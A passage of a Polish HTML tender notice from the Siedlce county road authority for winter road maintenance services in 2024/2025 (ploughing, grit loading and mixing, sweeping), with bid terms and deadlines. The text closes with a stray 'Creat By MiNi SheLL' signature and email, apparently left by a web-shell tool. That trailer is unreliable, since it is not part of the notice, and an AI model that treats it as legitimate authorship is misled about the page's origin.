za okres utrzymania stanu dyspozycyjności poświadczonej w „Zestawieniu pracy sprzętu” (wg wzoru udostępnionego przez Zamawiającego) przez osobę upoważnioną przez Zamawiającego.<br/>Poprzez czas pracy sprzętu rozumie się czas pracy równiarki przy odśnieżaniu dróg powiatowych objętych zamówieniem bez dojazdu do miejsca świadczenia usługi i powrotu do bazy. <br/>Zakres do wykonania usługi będzie regulowany przez przedstawiciela Zamawiającego stosownie do potrzeb uzależnionych od warunków atmosferycznych i sytuacji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres utrzymania gotowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usługi w zakresie zimowego utrzymania dróg powiatowych na terenie zarządzanym przez Zarząd Powiatu w Siedlcach w sezonie 2024/2025 przy pomocy dwóch ciągników o mocy minimum 110KM z pługiem skośnym Wykonawcy.<br/>Zimowe utrzymanie polega na:<br/>a) utrzymaniu stanu gotowości osób i środków technicznych zapewniającego przystąpienie do odśnieżania dróg w miejscu i czasie określonym przez Zamawiającego nie później niż w ciągu 1,0 – 3,0 godziny od powiadomienia przez Zamawiającego (zgodnie ze złożoną ofertą Wykonawcy);<br/>b) utrzymaniu stanu dyspozycyjności polegającego na możliwości natychmiastowego przystąpienia do odśnieżania dróg po upływie terminu określonego w pkt. a;<br/>c) odśnieżaniu dróg powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach wymienionych w załączniku nr 1 do SWZ: plan orientacyjny do odśnieżania zgodnie ze Standardami Zimowego Utrzymania Dróg Powiatowych Powiatu Siedleckiego.<br/><br/>Szacunkowy czas pracy sprzętu w ciągu sezonu zimowego 2024/2025 wynosi 140 roboczogodzin. <br/>Ilości te mają charakter orientacyjny i służą do ustalenia wartości złożonych ofert. <br/>Ostateczna wartość zadania będzie wyliczona na podstawie ceny jednostkowej brutto wskazanej przez Wykonawcę w formularzu ofertowym za 1 roboczogodzinę i faktycznie wykonanej usługi oraz kwoty w wysokości 25% stawki za 1 roboczogodzinę za okres utrzymania stanu dyspozycyjności poświadczonej w „Zestawieniu pracy sprzętu” (wg wzoru udostępnionego przez Zamawiającego) przez osobę upoważnioną przez Zamawiającego.<br/>Poprzez czas pracy sprzętu rozumie się czas pracy ciągnika przy odśnieżaniu dróg powiatowych objętych zamówieniem bez dojazdu do miejsca świadczenia usługi i powrotu do bazy. <br/>Zakres do wykonania usługi będzie regulowany przez przedstawiciela Zamawiającego stosownie do potrzeb uzależnionych od warunków atmosferycznych i sytuacji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres utrzymania gotowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług załadunku mieszanki soli i piasku na piaskarki/posypywarki zwalczające śliskość na drogach powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach oraz porządkowania placu przy pomocy koparki lub koparko – ładowarki Wykonawcy.<br/>Miejsce świadczenia usługi : plac Zamawiającego w m. Broszków, ul. Warszawska 186, 08-130 Kotuń.<br/>Realizując usługę Wykonawca zobowiązany będzie zapewnić: <br/>a) utrzymanie stanu gotowości osób i sprzętu do rozpoczęcia załadunku bądź porządkowania placu w miejscu i czasie określonym przez Zamawiającego nie później niż w ciągu 1,0 – 3,0 godziny od powiadomienia przez Zamawiającego (zgodnie ze złożoną ofertą Wykonawcy);<br/>b) utrzymanie stanu dyspozycyjności polegającego na możliwości natychmiastowego przystąpienia do załadunku bądź porządkowania placu po upływie terminu określonego w pkt. a;<br/>c) załadunek na wskazane przez Zamawiającego pługopiaskarki, piaskarki i inne samochody ciężarowe bądź przyczepy materiałów uszorstniających. <br/>Szacunkowy czas pracy sprzętu w ciągu sezonu zimowego 2024/2025 wynosi 290 roboczogodzin. <br/>Ilości te mają charakter orientacyjny i służą do ustalenia wartości złożonych ofert. <br/>Ostateczna wartość zadania będzie wyliczona na podstawie ceny jednostkowej brutto wskazanej przez Wykonawcę w formularzu ofertowym za 1 roboczogodzinę i faktycznie wykonanej usługi oraz kwoty w wysokości 25% stawki za 1 roboczogodzinę za okres utrzymania stanu dyspozycyjności poświadczonej w „Zestawieniu pracy sprzętu” (wg wzoru udostępnionego przez Zamawiającego) przez osobę upoważnioną przez Zamawiającego.<br/>Poprzez czas pracy sprzętu rozumie się czas pracy koparki lub koparko-ładowarki przy załadunku bądź porządkowaniu placu bez dojazdu do miejsca świadczenia usługi i powrotu do bazy. <br/>Zakres do wykonania usługi będzie regulowany przez przedstawiciela Zamawiającego stosownie do potrzeb. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres utrzymania gotowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług sporządzania mieszanki piasku z solą niezbędnej do zwalczania śliskości na drogach powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach przy pomocy ładowarki o minimalnej pojemności łyżki 2m3 Wykonawcy.<br/>Miejsce świadczenia usługi: plac Zamawiającego w m. Broszków, ul. Warszawska 186, 08-130 Kotuń.<br/>Realizując usługę Wykonawca zobowiązany będzie zapewnić: <br/>a) utrzymanie stanu gotowości osób i sprzętu do sporządzania mieszanki piasku z solą w miejscu i czasie określonym przez Zamawiającego nie później niż w ciągu 1,0 – 3,0 godziny od powiadomienia przez Zamawiającego (zgodnie ze złożoną ofertą Wykonawcy);<br/>b) utrzymanie stanu dyspozycyjności polegającego na możliwości natychmiastowego przystąpienia do sporządzania mieszanki piasku z solą po upływie terminu określonego w pkt. a;<br/>c) sporządzania mieszanki piasku z solą. <br/><br/>Szacunkowy czas pracy sprzętu w ciągu sezonu zimowego 2024/2025 wynosi 50 roboczogodzin. <br/>Ilości te mają charakter orientacyjny i służą do ustalenia wartości złożonych ofert. <br/>Ostateczna wartość zadania będzie wyliczona na podstawie ceny jednostkowej brutto wskazanej przez Wykonawcę w formularzu ofertowym za 1 roboczogodzinę i faktycznie wykonanej usługi oraz kwoty w wysokości 10 % stawki za 1 roboczogodzinę za okres utrzymania stanu dyspozycyjności poświadczonej w „Zestawieniu pracy sprzętu” (wg wzoru udostępnionego przez Zamawiającego) przez osobę upoważnioną przez Zamawiającego.<br/>Poprzez czas pracy sprzętu rozumie się czas pracy ładowarki przy sporządzaniu mieszanki piasku z solą do zwalczania śliskości bez dojazdu do miejsca świadczenia usługi i powrotu do bazy. <br/>Zakres do wykonania usługi będzie regulowany przez przedstawiciela Zamawiającego stosownie do potrzeb. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres utrzymania gotowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług z zakresu zamiatania w sezonie zimowym 2024/2025 dróg powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach przy pomocy pojazdu z zamiatarką mechaniczną posiadającą własny zbiornik na śmieci lub podajnik taśmowy, wyposażoną w zbiornik na wodę:<br/>- szerokość zamiatania minimum 2 m,<br/>- pojemność zbiornika zanieczyszczeń minimum 2,5 m3,<br/>- ilość szczotek talerzowych minimum 2, <br/>- ilość szczotek walcowych minimum 1. <br/>Wymagana ilość sprzętu: 2 szt.<br/><br/>Realizując usługę Wykonawca zobowiązany będzie zapewnić:<br/>a) utrzymanie stanu gotowości osób i środków technicznych zapewniającego przystąpienie do zamiatania dróg w miejscu i czasie określonym przez Zamawiającego nie później niż w ciągu 1,0 – 3,0 godziny od powiadomienia przez Zamawiającego (zgodnie ze złożoną ofertą Wykonawcy);<br/>b) utrzymanie stanu dyspozycyjności polegającego na możliwości natychmiastowego przystąpienia do zamiatania dróg po upływie terminu określonego w pkt. a;<br/>c) zamiatanie dróg powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach .<br/>Szacunkowy czas pracy sprzętu w ciągu sezonu zimowego 2024/2025 wynosi <br/>320 roboczogodzin. <br/>Ilości te mają charakter orientacyjny i służą do ustalenia wartości złożonych ofert. <br/>Ostateczna wartość zadania będzie wyliczona na podstawie ceny jednostkowej brutto wskazanej przez Wykonawcę w formularzu ofertowym za 1 roboczogodzinę i faktycznie wykonanej usługi oraz kwoty w wysokości 10% stawki za 1 roboczogodzinę za okres utrzymania stanu dyspozycyjności poświadczonej w „Zestawieniu pracy sprzętu” (wg wzoru udostępnionego przez Zamawiającego) przez osobę upoważnioną przez Zamawiającego.<br/>Poprzez czas pracy sprzętu rozumie się czas pracy pojazdu z zamiatarką mechaniczną przy zamiataniu dróg powiatowych objętych zamówieniem bez dojazdu do miejsca świadczenia usługi i powrotu do bazy. <br/>Zakres do wykonania usługi będzie regulowany przez przedstawiciela Zamawiającego stosownie do potrzeb uzależnionych od sytuacji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres utrzymania gotowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia na podstawie okoliczności, o których mowa w art. 108 ust 1 ustawy Pzp należy, pod rygorem wykluczenia z postępowania, złożyć w wyznaczonym przez Zamawiającego terminie oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy pzp o przynależności albo braku przynależności do tej samej grupy kapitałowej. Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla wykonawców wspólnie ubiegających się o udzielnie zamówienia:<br/>1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835) oraz art. 5k rozporządzenia 833/2014 w brzmieniu nadanym rozporządzeniem 2022/576, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt V ust 2 SWZ.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. VII ust. 1 pkt 2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>4.	W przypadku, gdy spełnienie warunku opisanego:<br/>1) w pkt. V ust. 2 pkt 1 i 2 SWZ wykazuje, co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2) w pkt. V ust. 2 pkt 4 SWZ wykonawcy wykazują poprzez poleganie na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji, których te zdolności są wymagane.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają w Formularzu Ofertowym, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określa załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiatsiedlecki.logintrade.net/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-15 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com